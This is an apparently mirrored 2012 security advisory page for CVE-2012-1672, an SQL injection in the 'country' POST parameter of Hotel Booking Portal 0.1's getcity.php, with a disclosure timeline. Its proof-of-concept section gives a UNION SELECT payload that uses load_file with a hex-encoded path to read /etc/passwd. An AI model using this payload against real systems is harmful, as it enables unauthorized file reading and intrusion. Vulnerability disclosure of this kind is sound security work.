Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27900
HistoryApr 09, 2012 - 12:00 a.m.

'Hotel Booking Portal' SQL Injection (CVE-2012-1672)

2012-04-0900:00:00
vulners.com
17
JSON

'Hotel Booking Portal' SQL Injection (CVE-2012-1672)
Mark Stanislav - [email protected]

I. DESCRIPTION

A vulnerability exists in getcity.php that allows for SQL injection of
the 'country' POST parameter.

II. TESTED VERSION

0.1

III. PoC EXPLOIT

POST a form to getcity.php with the value of 'country' set to: ' union
select null,null,load_file(0x2f6574632f706173737764),null,null,null,null,null
from users where 'a'='a

IV. SOLUTION

Do not use this software, no patched version exists at this time.

V. REFERENCES

http://sourceforge.net/projects/hbportal/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1672

VI. TIMELINE

03/02/2012 - Initial vendor disclosure
03/20/2012 - Received no response and sent a second e-mail to the vendor
04/04/2012 - Public disclosure

Related

prion 1
exploitpack 1
seebug 1
packetstorm 1
cve 1
exploitdb 1
securityvulns 1
prion
prion
Sql injection
2012-04-11 10:39:00
exploitpack
exploitpack
Hotel Booking Portal - SQL Injection
2012-04-04 00:00:00
seebug
seebug
Hotel Booking Portal - SQL Injection
2014-07-01 00:00:00
packetstorm
packetstorm
Hotel Booking Portal 0.1 SQL Injection
2012-04-04 00:00:00
cve
cve
CVE-2012-1672
2012-04-11 10:39:00
exploitdb
exploitdb
Hotel Booking Portal - SQL Injection
2012-04-04 00:00:00
securityvulns
securityvulns
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
2012-04-09 00:00:00
JSON
Related for SECURITYVULNS:DOC:27900
prion1exploitpack1seebug1packetstorm1cve1exploitdb1securityvulns1